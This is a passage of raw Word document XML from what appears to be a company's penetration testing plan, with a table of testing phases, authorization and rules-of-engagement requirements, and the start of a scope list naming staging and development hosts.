          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Phases Overview</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20"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="3960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">When</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Who</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. SAST + Dependency Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Static</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Every PR / CI pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal (Claude Code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Network Port Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pre-pilot, quarterly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal or contracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Active Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pre-pilot, bi-annually</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Contracted firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Session Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pre-pilot, bi-annually</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Contracted firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Social Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Human</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pre-enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Contracted firm only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Physical Access Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pre-enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Contracted firm only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7. Runtime Memory Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pre-enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Contracted firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8. Zero-Day Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Research</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Continuous / bug bounty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal + researchers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9. API Security Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Every release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal or contracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10. Cloud Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Static + Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Quarterly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal or contracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11. RBAC + Tenant Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Every release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Legal Authorization and Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="EF4444" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ WARNING: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No penetration testing activity may begin without a signed Rules of Engagement (ROE) document and explicit written authorization from NexCort iQ leadership. This applies to both internal security engineers and contracted firms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before any test begins, the following must be in place:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Signed Penetration Test Authorization Form (RC-SEC-AUTH-001)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Defined scope document listing all in-scope systems, IP ranges, and domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Out-of-scope systems explicitly listed (production agency data is always out of scope)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency contact list — who to call if a test causes an outage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Start and end dates with daily testing windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Notification to AWS (required for network scans against AWS infrastructure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Notification to any affected agency customers (for social engineering tests)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NDA executed with any contracted testing firm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always In Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Staging environment — api-staging.rapidcortex.us, app-staging.rapidcortex.us</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Development environment — api-dev.rapidcortex.us</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RC team test accounts and test agency tenants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
